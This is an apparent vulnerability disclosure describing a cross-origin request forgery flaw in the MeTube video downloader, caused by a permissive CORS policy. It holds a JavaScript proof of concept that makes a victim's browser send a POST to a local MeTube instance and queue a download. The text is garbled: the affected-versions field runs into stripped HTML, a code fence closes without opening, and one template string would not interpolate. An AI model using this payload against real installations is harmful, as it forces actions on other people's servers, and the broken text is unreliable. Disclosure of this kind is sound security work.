# CVE Report: Cross-Origin Request Forgery via Permissive CORS Policy in alexta69/MeTube ## Vulnerability Overview * **Product Name**: MeTube (alexta69/metube) * **Affected Versions**: MeTube CORS PoC MeTube CORS PoC Trigger cross-origin download document.getElementById('btn').onclick = async () => { const log = document.getElementById('log'); try { const resp = await fetch('http://localhost:8081/add', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({ url: 'https://www.youtube.com/watch?v=dQw4w9WgXcQ', quality: 'best', download_type: 'video', format: 'any', codec: 'auto' }) }); log.textContent += '[+] Response (resp.status): ${await resp.text()}\n'; log.textContent += '[+] Cross-origin download initiated successfully!'; } catch(e) { log.textContent += '[-] Failed: ' + e.message; } }; ```